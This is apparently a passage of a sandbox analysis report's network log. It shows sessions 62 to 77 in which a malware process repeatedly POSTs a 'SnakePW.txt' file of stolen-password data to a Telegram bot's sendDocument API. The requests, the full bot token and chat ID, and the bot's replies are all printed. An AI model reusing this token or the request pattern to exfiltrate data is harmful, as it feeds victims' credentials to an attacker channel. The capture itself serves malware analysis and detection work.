62 | 192.168.2.5 | 49999 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:19 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21d05113ef78
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:19 UTC | 535 | OUT | Data Ascii: --------------------------8dd21d05113ef78Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:20 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:19 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:20 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418931,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535099,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 50004 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21cf699ce188
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd21cf699ce188Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:21 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:21 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418934,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 50005 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd23627ca5d7a5
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd23627ca5d7a5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:22 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418936,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
65 | 192.168.2.5 | 50007 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:21 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd21f3fd82474b
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:21 UTC | 535 | OUT | Data Ascii: --------------------------8dd21f3fd82474bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:22 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:21 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:22 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418937,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535101,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.5 | 50014 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd221a131b77fa
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:23 UTC | 535 | OUT | Data Ascii: --------------------------8dd221a131b77faContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:24 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:23 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:24 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418940,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      67192.168.2.550013149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:23 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23a7e0c358b1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:23 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 61 37 65 30 63 33 35 38 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd23a7e0c358b1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:24 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:24 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 517
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:24 UTC | 517 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418943,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.5 | 50012 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:23 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd21f715d5f928
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:23 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd21f715d5f928Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:24 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:23 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:24 UTC | 515 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418941,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535103,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.5 | 50020 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2228c5d66ead
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:25 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd2228c5d66eadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:26 UTC | 515 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418946,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.5 | 50022 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd224dea6ac3fc
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:25 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd224dea6ac3fcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:26 UTC | 515 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418947,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.5 | 50021 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:25 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2410d566cb44
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:25 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd2410d566cb44Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:26 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:26 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:26 UTC | 515 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418949,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535106,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.5 | 50028 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2253ee1debeb
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:27 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd2253ee1debebContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:28 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:28 UTC | 515 | IN |
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418952,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 50029 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd227b407d5dfd
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
2024-12-18 15:18:27 UTC | 535 | OUT |
                                                                                                                      Data Ascii: --------------------------8dd227b407d5dfdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:28 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:28 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:28 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 30 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418953,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.5 | 50030 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:27 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd2470cc4c7c4c
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:27 UTC | 535 | OUT | Data Ascii: --------------------------8dd2470cc4c7c4cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:28 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:28 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:28 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418955,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535108,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.5 | 50037 | 149.154.167.220 | 443 | 2140 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd228686aed571
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:29 UTC | 535 | OUT | Data Ascii: --------------------------8dd228686aed571Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
2024-12-18 15:18:30 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:30 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418958,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535109,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.5 | 50038 | 149.154.167.220 | 443 | 432 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd22ac30a66dbf
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:29 UTC | 535 | OUT | Data Ascii: --------------------------8dd22ac30a66dbfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
2024-12-18 15:18:30 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:30 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-18 15:18:30 UTC | 515 | IN | Data Ascii: {"ok":true,"result":{"message_id":418959,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535110,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.5 | 50039 | 149.154.167.220 | 443 | 6656 | C:\Users\Public\Libraries\xzeheenC.pif
Timestamp | Bytes transferred | Direction | Data
2024-12-18 15:18:29 UTC | 328 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
Content-Type: multipart/form-data; boundary=------------------------8dd24f09b604f03
Host: api.telegram.org
Content-Length: 535
2024-12-18 15:18:29 UTC | 535 | OUT | Data Ascii: --------------------------8dd24f09b604f03Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
2024-12-18 15:18:30 UTC | 388 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Wed, 18 Dec 2024 15:18:30 GMT
Content-Type: application/json
Content-Length: 515
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
